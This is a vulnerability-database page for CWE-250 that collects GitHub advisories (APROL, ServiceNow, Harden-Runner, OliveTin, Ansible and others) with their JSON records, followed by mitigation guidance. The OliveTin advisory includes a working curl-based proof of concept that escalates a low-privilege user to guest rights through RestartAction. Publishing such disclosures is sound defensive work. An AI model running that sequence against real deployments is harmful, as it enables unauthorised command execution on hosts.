CWE-250
AllowedExecution with Unnecessary Privileges
Abstraction: Base · Status: Draft
The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses.
573 vulnerabilities reference this CWE, most recent first.
GHSA-MVJ8-H6FP-PCRP
Vulnerability from github – Published: 2024-08-29 12:31 – Updated: 2024-09-13 21:31An untrusted search path vulnerability in B&R APROL <= R 4.4-00P3 may be used by an authenticated local attacker to get other users to execute arbitrary code under their privileges.
{
"affected": [],
"aliases": [
"CVE-2024-5623"
],
"database_specific": {
"cwe_ids": [
"CWE-250",
"CWE-426"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-08-29T11:15:27Z",
"severity": "MODERATE"
},
"details": "An untrusted search path vulnerability in B\u0026R APROL \u003c= R 4.4-00P3 may be used by an authenticated local attacker to get other users to execute arbitrary code under their privileges.",
"id": "GHSA-mvj8-h6fp-pcrp",
"modified": "2024-09-13T21:31:21Z",
"published": "2024-08-29T12:31:05Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-5623"
},
{
"type": "WEB",
"url": "https://www.br-automation.com/fileadmin/SA24P2014_Multiple_vulnerabilities_in_BR_APROL.pdf-367290ae.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-MWG5-CWH8-88M5
Vulnerability from github – Published: 2026-01-13 00:30 – Updated: 2026-01-27 21:31A vulnerability has been identified in the ServiceNow AI Platform that could enable an unauthenticated user to impersonate another user and perform the operations that the impersonated user is entitled to perform.
ServiceNow has addressed this vulnerability by deploying a relevant security update to hosted instances in October 2025. Security updates have also been provided to ServiceNow self-hosted customers, partners, and hosted customers with unique configurations. Additionally, the vulnerability is addressed in the listed Store App versions. We recommend that customers promptly apply an appropriate security update or upgrade if they have not already done so.
{
"affected": [],
"aliases": [
"CVE-2025-12420"
],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-250"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-01-12T22:16:07Z",
"severity": "CRITICAL"
},
"details": "A vulnerability has been identified in the ServiceNow AI Platform that could enable an unauthenticated user to impersonate another user and perform the operations that the impersonated user is entitled to perform.\n\nServiceNow has addressed this vulnerability by deploying a relevant security update to \u00a0hosted instances in October 2025. Security updates have also been provided to ServiceNow self-hosted customers, partners, and hosted customers with unique configurations. Additionally, the vulnerability is addressed in the listed Store App versions. We recommend that customers promptly apply an appropriate security update or upgrade if they have not already done so.",
"id": "GHSA-mwg5-cwh8-88m5",
"modified": "2026-01-27T21:31:40Z",
"published": "2026-01-13T00:30:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12420"
},
{
"type": "WEB",
"url": "https://support.servicenow.com/kb?id=kb_article_view\u0026sysparm_article=KB2587329"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:Y/R:U/V:C/RE:H/U:Amber",
"type": "CVSS_V4"
}
]
}
GHSA-MXR3-8WHJ-J74R
Vulnerability from github – Published: 2025-04-22 01:07 – Updated: 2025-04-22 01:07Summary
Harden-Runner includes a policy option disable-sudo to prevent the GitHub Actions runner user from using sudo. This is implemented by removing the runner user from the sudoers file. However, this control can be bypassed as the runner user, being part of the docker group, can interact with the Docker daemon to launch privileged containers or access the host filesystem. This allows the attacker to regain root access or restore the sudoers file, effectively bypassing the restriction.
For an attacker to bypass this control, they would first need the ability to run their malicious code (e.g., by a supply chain attack similar to tj-actions or exploiting a Pwn Request vulnerability)) on the runner. This vulnerability has been fixed in Harden-Runner version v2.12.0.
Impact
An attacker with the ability to run their malicious code on a runner configured with disable-sudo: true can escalate privileges to root using Docker, defeating the intended security control.
Affected Configuration
• Harden-Runner configurations that use disable-sudo: true on GitHub-hosted runners or on ephemeral self-hosted VM-based runners.
• This issue does not apply to Kubernetes-based Actions Runner Controller (ARC) Harden-Runner.
Mitigation / Fix
This vulnerability has been fixed in Harden-Runner version v2.12.0. Users should migrate to the stronger disable-sudo-and-containers policy. This setting:
• Disables sudo access,
• Removes access to dockerd and containerd sockets,
• Uninstalls Docker from the runner entirely, preventing container-based privilege escalation paths.
Additional Improvements
• The disable-sudo option will be deprecated in the future, as it does not sufficiently restrict privilege escalation on its own.
• Harden-Runner now includes detections to alert on attempts to evade the disable-sudo policy.
Credits
Reported by @loresuso and @darryk10. We would like to thank them for collaborating with us to mitigate the vulnerability.
{
"affected": [
{
"package": {
"ecosystem": "GitHub Actions",
"name": "step-security/harden-runner"
},
"ranges": [
{
"events": [
{
"introduced": "0.12.0"
},
{
"fixed": "2.12.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-32955"
],
"database_specific": {
"cwe_ids": [
"CWE-250",
"CWE-268",
"CWE-272"
],
"github_reviewed": true,
"github_reviewed_at": "2025-04-22T01:07:03Z",
"nvd_published_at": "2025-04-21T21:15:20Z",
"severity": "MODERATE"
},
"details": "### Summary\nHarden-Runner includes a policy option `disable-sudo` to prevent the GitHub Actions runner user from using sudo. This is implemented by removing the runner user from the sudoers file. However, this control can be bypassed as the runner user, being part of the docker group, can interact with the Docker daemon to launch privileged containers or access the host filesystem. This allows the attacker to regain root access or restore the sudoers file, effectively bypassing the restriction. \n\nFor an attacker to bypass this control, they would first need the ability to run their malicious code (e.g., by a supply chain attack similar to tj-actions or exploiting a Pwn Request vulnerability)) on the runner. This vulnerability has been fixed in Harden-Runner version `v2.12.0`.\n\n### Impact\nAn attacker with the ability to run their malicious code on a runner configured with `disable-sudo: true` can escalate privileges to root using Docker, defeating the intended security control.\n\n### Affected Configuration\n\u2022\tHarden-Runner configurations that use `disable-sudo: true` on GitHub-hosted runners or on ephemeral self-hosted VM-based runners.\n\u2022\tThis issue does not apply to Kubernetes-based Actions Runner Controller (ARC) Harden-Runner.\n\n### Mitigation / Fix\nThis vulnerability has been fixed in Harden-Runner version `v2.12.0`. Users should migrate to the stronger `disable-sudo-and-containers` policy. This setting:\n\u2022\tDisables sudo access,\n\u2022\tRemoves access to dockerd and containerd sockets,\n\u2022\tUninstalls Docker from the runner entirely, preventing container-based privilege escalation paths.\n\n\n### Additional Improvements\n\u2022\tThe `disable-sudo` option will be deprecated in the future, as it does not sufficiently restrict privilege escalation on its own. \n\u2022\tHarden-Runner now includes detections to alert on attempts to evade the `disable-sudo` policy.\n\n\n### Credits\nReported by @loresuso and @darryk10. We would like to thank them for collaborating with us to mitigate the vulnerability.",
"id": "GHSA-mxr3-8whj-j74r",
"modified": "2025-04-22T01:07:03Z",
"published": "2025-04-22T01:07:03Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/step-security/harden-runner/security/advisories/GHSA-mxr3-8whj-j74r"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32955"
},
{
"type": "WEB",
"url": "https://github.com/step-security/harden-runner/commit/0634a2670c59f64b4a01f0f96f84700a4088b9f0"
},
{
"type": "PACKAGE",
"url": "https://github.com/step-security/harden-runner"
},
{
"type": "WEB",
"url": "https://github.com/step-security/harden-runner/releases/tag/v2.12.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Harden-Runner allows evasion of \u0027disable-sudo\u0027 policy"
}
GHSA-P252-2Q9W-FX63
Vulnerability from github – Published: 2025-09-16 15:32 – Updated: 2025-09-17 15:30An issue in Online Library Management System v.3.0 allows an attacker to escalate privileges via the adminlogin.php component and the Login function
{
"affected": [],
"aliases": [
"CVE-2025-57119"
],
"database_specific": {
"cwe_ids": [
"CWE-250"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-09-16T14:15:55Z",
"severity": "CRITICAL"
},
"details": "An issue in Online Library Management System v.3.0 allows an attacker to escalate privileges via the adminlogin.php component and the Login function",
"id": "GHSA-p252-2q9w-fx63",
"modified": "2025-09-17T15:30:30Z",
"published": "2025-09-16T15:32:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57119"
},
{
"type": "WEB",
"url": "https://github.com/Jazeye/CVE/blob/main/CVE-2025-57119/README.md"
},
{
"type": "WEB",
"url": "https://github.com/danielmiessler/SecLists/blob/master/Usernames/cirt-default-usernames.txt"
},
{
"type": "WEB",
"url": "https://phpgurukul.com"
},
{
"type": "WEB",
"url": "http://online.com"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-P2GG-669J-9R2C
Vulnerability from github – Published: 2024-05-31 18:31 – Updated: 2025-11-04 00:30IBM Security Verify Access Docker 10.0.0 through 10.0.6 could allow a local user to escalate their privileges due to execution of unnecessary privileges. IBM X-Force ID: 292418.
{
"affected": [],
"aliases": [
"CVE-2024-35142"
],
"database_specific": {
"cwe_ids": [
"CWE-250"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-05-31T17:15:09Z",
"severity": "HIGH"
},
"details": "IBM Security Verify Access Docker 10.0.0 through 10.0.6 could allow a local user to escalate their privileges due to execution of unnecessary privileges. IBM X-Force ID: 292418.",
"id": "GHSA-p2gg-669j-9r2c",
"modified": "2025-11-04T00:30:49Z",
"published": "2024-05-31T18:31:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35142"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/292418"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/7155356"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2024/Nov/0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-P2QW-P488-W89R
Vulnerability from github – Published: 2025-05-17 18:30 – Updated: 2025-05-17 18:30IBM i 7.2, 7.3, 7.4, 7.5, and 7.6 product IBM TCP/IP Connectivity Utilities for i contains a privilege escalation vulnerability. A malicious actor with command line access to the host operating system can elevate privileges to gain root access to the host operating system.
{
"affected": [],
"aliases": [
"CVE-2025-33103"
],
"database_specific": {
"cwe_ids": [
"CWE-250"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-05-17T16:15:18Z",
"severity": "HIGH"
},
"details": "IBM i 7.2, 7.3, 7.4, 7.5, and 7.6 product IBM TCP/IP Connectivity Utilities for i contains a privilege escalation vulnerability. A malicious actor with command line access to the host operating system can elevate privileges to gain root access to the host operating system.",
"id": "GHSA-p2qw-p488-w89r",
"modified": "2025-05-17T18:30:29Z",
"published": "2025-05-17T18:30:29Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33103"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/7233799"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-P443-P7W5-2F7F
Vulnerability from github – Published: 2026-03-05 20:53 – Updated: 2026-03-06 22:52Summary
An authentication context confusion vulnerability in RestartAction allows a low‑privileged authenticated user to execute actions they are not permitted to run.
RestartAction constructs a new internal connect.Request without preserving the original caller’s authentication headers or cookies. When this synthetic request is passed to StartAction, the authentication resolver falls back to the guest user. If the guest account has broader permissions than the authenticated caller, this results in privilege escalation and unauthorized command execution.
This vulnerability allows a low‑privileged authenticated user to bypass ACL restrictions and execute arbitrary configured shell actions.
Details
Affected files:
service/internal/api/api.go
service/internal/auth/authcheck.go
Relevant code in RestartAction:
return api.StartAction(ctx, &connect.Request[apiv1.StartActionRequest]{
Msg: &apiv1.StartActionRequest{
BindingId: execReqLogEntry.GetBindingId(),
UniqueTrackingId: req.Msg.ExecutionTrackingId,
},
})
Authentication in StartAction:
authenticatedUser := auth.UserFromApiCall(ctx, req, api.cfg)
Issue:
-
RestartAction creates a new connect.Request object.
-
The new request does not preserve caller headers or cookies.
-
UserFromApiCall() attempts to resolve the user from the request.
-
Because authentication headers are missing, it falls back to the guest user.
-
If guest.exec = true while the original caller has exec = false, the action executes with elevated privileges.
PoC
Configuration:
defaultPermissions:
exec: false
users:
- username: low
password: lowpass
permissions:
exec: false
- username: guest
permissions:
exec: true
actions:
- id: restart_bypass_action
shell: |
echo "pwned" > /tmp/olivetin_restart_bypass.txt
Steps to reproduce:
Login as low user
LOW_LOGIN=$(curl -sS -i -X POST \
http://localhost:1337/olivetin.api.v1.OliveTinApiService/LocalUserLogin \
-H 'Content-Type: application/json' \
-d '{"username":"low","password":"lowpass"}')
LOW_SID=$(printf '%s\n' "$LOW_LOGIN" | tr -d '\r' | \
awk -F'[=;]' '/^Set-Cookie: olivetin-sid-local=/{print $2; exit}')
Attempt direct execution (correctly blocked)
LOW_RUN=$(curl -sS -X POST \
http://localhost:1337/olivetin.api.v1.OliveTinApiService/StartActionAndWait \
-H 'Content-Type: application/json' \
-H "Cookie: olivetin-sid-local=$LOW_SID" \
-d '{"actionId":"restart_bypass_action"}')
echo "$LOW_RUN"
This should return permission denied.
Extract executionTrackingId from response:
TRACKING_ID=$(printf '%s' "$LOW_RUN" | \
sed -n 's/.*"executionTrackingId":"\([^"]*\)".*/\1/p' | head -n1)
echo "Tracking ID: $TRACKING_ID"
Call RestartAction:
curl -sS -X POST \
http://localhost:1337/olivetin.api.v1.OliveTinApiService/RestartAction \
-H 'Content-Type: application/json' \
-H "Cookie: olivetin-sid-local=$LOW_SID" \
-d "{\"executionTrackingId\":\"$TRACKING_ID\"}"
Verify command executed:
cat /tmp/olivetin_restart_bypass.txt
Output:
pwned
Impact
- Privilege Escalation
- ACL Bypass
- Unauthorized Command Execution
Any authenticated low-privilege user can execute actions they are not authorized to run if: - Guest has broader permissions - RestartAction is enabled Because OliveTin actions execute system shell commands, this can lead to: - Arbitrary file writes - Sensitive data exposure - Potential full host compromise (depending on OliveTin runtime privileges)
This affects all deployments where: - guest.exec = true - A restricted user has exec = false - RestartAction endpoint is accessible
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/OliveTin/OliveTin"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.0.0-20260305000458-cb46a597b246"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-30225"
],
"database_specific": {
"cwe_ids": [
"CWE-250",
"CWE-441"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-05T20:53:46Z",
"nvd_published_at": "2026-03-06T21:16:16Z",
"severity": "MODERATE"
},
"details": "### Summary\nAn authentication context confusion vulnerability in RestartAction allows a low\u2011privileged authenticated user to execute actions they are not permitted to run.\n\nRestartAction constructs a new internal connect.Request without preserving the original caller\u2019s authentication headers or cookies. When this synthetic request is passed to StartAction, the authentication resolver falls back to the guest user. If the guest account has broader permissions than the authenticated caller, this results in privilege escalation and unauthorized command execution.\n\nThis vulnerability allows a low\u2011privileged authenticated user to bypass ACL restrictions and execute arbitrary configured shell actions.\n\n### Details\nAffected files:\n\nservice/internal/api/api.go\n\nservice/internal/auth/authcheck.go\n\nRelevant code in RestartAction:\n\n```\nreturn api.StartAction(ctx, \u0026connect.Request[apiv1.StartActionRequest]{\n Msg: \u0026apiv1.StartActionRequest{\n BindingId: execReqLogEntry.GetBindingId(),\n UniqueTrackingId: req.Msg.ExecutionTrackingId,\n },\n})\n```\nAuthentication in StartAction:\n```\nauthenticatedUser := auth.UserFromApiCall(ctx, req, api.cfg)\n```\nIssue:\n\n1. RestartAction creates a new connect.Request object.\n\n2. The new request does not preserve caller headers or cookies.\n\n3. UserFromApiCall() attempts to resolve the user from the request.\n\n4. Because authentication headers are missing, it falls back to the guest user.\n\n5. If guest.exec = true while the original caller has exec = false, the action executes with elevated privileges.\n\n### PoC\n\nConfiguration:\n```\ndefaultPermissions:\n exec: false\n\nusers:\n - username: low\n password: lowpass\n permissions:\n exec: false\n\n - username: guest\n permissions:\n exec: true\n\nactions:\n - id: restart_bypass_action\n shell: |\n echo \"pwned\" \u003e /tmp/olivetin_restart_bypass.txt\n```\n\nSteps to reproduce:\n\nLogin as low user\n```\nLOW_LOGIN=$(curl -sS -i -X POST \\\n http://localhost:1337/olivetin.api.v1.OliveTinApiService/LocalUserLogin \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \u0027{\"username\":\"low\",\"password\":\"lowpass\"}\u0027)\n\nLOW_SID=$(printf \u0027%s\\n\u0027 \"$LOW_LOGIN\" | tr -d \u0027\\r\u0027 | \\\n awk -F\u0027[=;]\u0027 \u0027/^Set-Cookie: olivetin-sid-local=/{print $2; exit}\u0027)\n```\nAttempt direct execution (correctly blocked)\n```\nLOW_RUN=$(curl -sS -X POST \\\n http://localhost:1337/olivetin.api.v1.OliveTinApiService/StartActionAndWait \\\n -H \u0027Content-Type: application/json\u0027 \\\n -H \"Cookie: olivetin-sid-local=$LOW_SID\" \\\n -d \u0027{\"actionId\":\"restart_bypass_action\"}\u0027)\n\necho \"$LOW_RUN\"\n```\nThis should return permission denied.\n\nExtract executionTrackingId from response:\n```\nTRACKING_ID=$(printf \u0027%s\u0027 \"$LOW_RUN\" | \\\n sed -n \u0027s/.*\"executionTrackingId\":\"\\([^\"]*\\)\".*/\\1/p\u0027 | head -n1)\n\necho \"Tracking ID: $TRACKING_ID\"\n```\nCall RestartAction:\n```\ncurl -sS -X POST \\\n http://localhost:1337/olivetin.api.v1.OliveTinApiService/RestartAction \\\n -H \u0027Content-Type: application/json\u0027 \\\n -H \"Cookie: olivetin-sid-local=$LOW_SID\" \\\n -d \"{\\\"executionTrackingId\\\":\\\"$TRACKING_ID\\\"}\"\n```\nVerify command executed:\n```\ncat /tmp/olivetin_restart_bypass.txt\n```\nOutput:\n```\npwned\n```\n\n### Impact\n- Privilege Escalation\n- ACL Bypass\n- Unauthorized Command Execution\n\nAny authenticated low-privilege user can execute actions they are not authorized to run if:\n- Guest has broader permissions\n- RestartAction is enabled\nBecause OliveTin actions execute system shell commands, this can lead to:\n- Arbitrary file writes\n- Sensitive data exposure\n- Potential full host compromise (depending on OliveTin runtime privileges)\n\nThis affects all deployments where:\n- guest.exec = true\n- A restricted user has exec = false\n- RestartAction endpoint is accessible",
"id": "GHSA-p443-p7w5-2f7f",
"modified": "2026-03-06T22:52:19Z",
"published": "2026-03-05T20:53:46Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/OliveTin/OliveTin/security/advisories/GHSA-p443-p7w5-2f7f"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30225"
},
{
"type": "WEB",
"url": "https://github.com/OliveTin/OliveTin/commit/cb46a597b2465235839ed58cf034b5e7b70ef911"
},
{
"type": "PACKAGE",
"url": "https://github.com/OliveTin/OliveTin"
},
{
"type": "WEB",
"url": "https://github.com/OliveTin/OliveTin/releases/tag/3000.11.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "OliveTin\u0027s RestartAction always runs actions as guest"
}
GHSA-P4RQ-M78W-7MC2
Vulnerability from github – Published: 2025-08-27 00:31 – Updated: 2025-08-27 15:33In multiple locations, there is a possible way to overlay the installation confirmation dialog due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
{
"affected": [],
"aliases": [
"CVE-2025-0080"
],
"database_specific": {
"cwe_ids": [
"CWE-250"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-08-26T23:15:32Z",
"severity": "HIGH"
},
"details": "In multiple locations, there is a possible way to overlay the installation confirmation dialog due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.",
"id": "GHSA-p4rq-m78w-7mc2",
"modified": "2025-08-27T15:33:14Z",
"published": "2025-08-27T00:31:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0080"
},
{
"type": "WEB",
"url": "https://android.googlesource.com/platform/frameworks/base/+/5916a3de10fa9ca6a9b31f489be1838c0a1613f4"
},
{
"type": "WEB",
"url": "https://source.android.com/security/bulletin/2025-03-01"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-P62G-JHG6-V3RQ
Vulnerability from github – Published: 2021-04-07 20:37 – Updated: 2024-11-18 16:26A flaw was found in Ansible Engine, all versions 2.7.x, 2.8.x and 2.9.x prior to 2.7.17, 2.8.11, and 2.9.7 respectively, when using ansible_facts as a subkey of itself and promoting it to a variable when inject is enabled, overwriting the ansible_facts after the clean. An attacker could take advantage of this by altering the ansible_facts, such as ansible_hosts, users and any other key data which would lead into privilege escalation or code injection.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "ansible"
},
"ranges": [
{
"events": [
{
"introduced": "2.7.0a1"
},
{
"fixed": "2.7.17"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "ansible"
},
"ranges": [
{
"events": [
{
"introduced": "2.8.0a1"
},
{
"fixed": "2.8.11"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "ansible"
},
"ranges": [
{
"events": [
{
"introduced": "2.9.0a1"
},
{
"fixed": "2.9.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-10684"
],
"database_specific": {
"cwe_ids": [
"CWE-250",
"CWE-362",
"CWE-862",
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2021-04-05T14:46:48Z",
"nvd_published_at": "2020-03-24T14:15:00Z",
"severity": "MODERATE"
},
"details": "A flaw was found in Ansible Engine, all versions 2.7.x, 2.8.x and 2.9.x prior to 2.7.17, 2.8.11, and 2.9.7 respectively, when using ansible_facts as a subkey of itself and promoting it to a variable when inject is enabled, overwriting the ansible_facts after the clean. An attacker could take advantage of this by altering the ansible_facts, such as ansible_hosts, users and any other key data which would lead into privilege escalation or code injection.",
"id": "GHSA-p62g-jhg6-v3rq",
"modified": "2024-11-18T16:26:11Z",
"published": "2021-04-07T20:37:06Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-10684"
},
{
"type": "WEB",
"url": "https://github.com/ansible/ansible/commit/0b4788a71fc7d24ffa957a94ee5e23d6a9733ab0"
},
{
"type": "WEB",
"url": "https://github.com/ansible/ansible/commit/1d0d2645eed36ac4e17052ab4eacf240132d96fb"
},
{
"type": "WEB",
"url": "https://github.com/ansible/ansible/commit/5eabf7bb93c9bfc375b806a2b1f623d650cddc2b"
},
{
"type": "WEB",
"url": "https://github.com/ansible/ansible/commit/a9d2ceafe429171c0e2ad007058b88bae57c74ce"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-10684"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-p62g-jhg6-v3rq"
},
{
"type": "PACKAGE",
"url": "https://github.com/ansible/ansible"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2020-207.yaml"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DKPA4KC3OJSUFASUYMG66HKJE7ADNGFW"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MRRYUU5ZBLPBXCYG6CFP35D64NP2UB2S"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WQVOQD4VAIXXTVQAJKTN7NUGTJFE2PCB"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/202006-11"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2021/dsa-4950"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Code Injection, Race Condition, and Execution with Unnecessary Privileges in Ansible"
}
GHSA-P6PR-8HCJ-HMV4
Vulnerability from github – Published: 2024-07-10 00:30 – Updated: 2024-07-10 00:30IBM WebSphere Application Server 8.5 and 9.0 could allow a remote authenticated attacker, who has authorized access to the administrative console, to execute arbitrary code. Using specially crafted input, the attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 292641.
{
"affected": [],
"aliases": [
"CVE-2024-35154"
],
"database_specific": {
"cwe_ids": [
"CWE-250"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-07-09T22:15:02Z",
"severity": "HIGH"
},
"details": "IBM WebSphere Application Server 8.5 and 9.0 could allow a remote authenticated attacker, who has authorized access to the administrative console, to execute arbitrary code. Using specially crafted input, the attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 292641.",
"id": "GHSA-p6pr-8hcj-hmv4",
"modified": "2024-07-10T00:30:41Z",
"published": "2024-07-10T00:30:41Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35154"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/292641"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/7159825"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation MIT-17
Strategy: Environment Hardening
Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.
Mitigation MIT-18
Strategy: Separation of Privilege
Identify the functionality that requires additional privileges, such as access to privileged operating system resources. Wrap and centralize this functionality if possible, and isolate the privileged code as much as possible from other code [REF-76]. Raise privileges as late as possible, and drop them as soon as possible to avoid CWE-271. Avoid weaknesses such as CWE-288 and CWE-420 by protecting all possible communication channels that could interact with the privileged code, such as a secondary socket that is only intended to be accessed by administrators.
Mitigation MIT-18
Strategy: Attack Surface Reduction
Identify the functionality that requires additional privileges, such as access to privileged operating system resources. Wrap and centralize this functionality if possible, and isolate the privileged code as much as possible from other code [REF-76]. Raise privileges as late as possible, and drop them as soon as possible to avoid CWE-271. Avoid weaknesses such as CWE-288 and CWE-420 by protecting all possible communication channels that could interact with the privileged code, such as a secondary socket that is only intended to be accessed by administrators.
Mitigation
Perform extensive input validation for any privileged code that must be exposed to the user and reject anything that does not fit your strict requirements.
Mitigation MIT-19
When dropping privileges, ensure that they have been dropped successfully to avoid CWE-273. As protection mechanisms in the environment get stronger, privilege-dropping calls may fail even if it seems like they would always succeed.
Mitigation
If circumstances force you to run with extra privileges, then determine the minimum access level necessary. First identify the different permissions that the software and its users will need to perform their actions, such as file read and write permissions, network socket permissions, and so forth. Then explicitly allow those actions while denying all else [REF-76]. Perform extensive input validation and canonicalization to minimize the chances of introducing a separate vulnerability. This mitigation is much more prone to error than dropping the privileges in the first place.
Mitigation MIT-37
Strategy: Environment Hardening
Ensure that the software runs properly under the United States Government Configuration Baseline (USGCB) [REF-199] or an equivalent hardening configuration guide, which many organizations use to limit the attack surface and potential risk of deployed software.
CAPEC-104: Cross Zone Scripting
An attacker is able to cause a victim to load content into their web-browser that bypasses security zone controls and gain access to increased privileges to execute scripting code or other web objects such as unsigned ActiveX controls or applets. This is a privilege elevation attack targeted at zone-based web-browser security.
CAPEC-470: Expanding Control over the Operating System from the Database
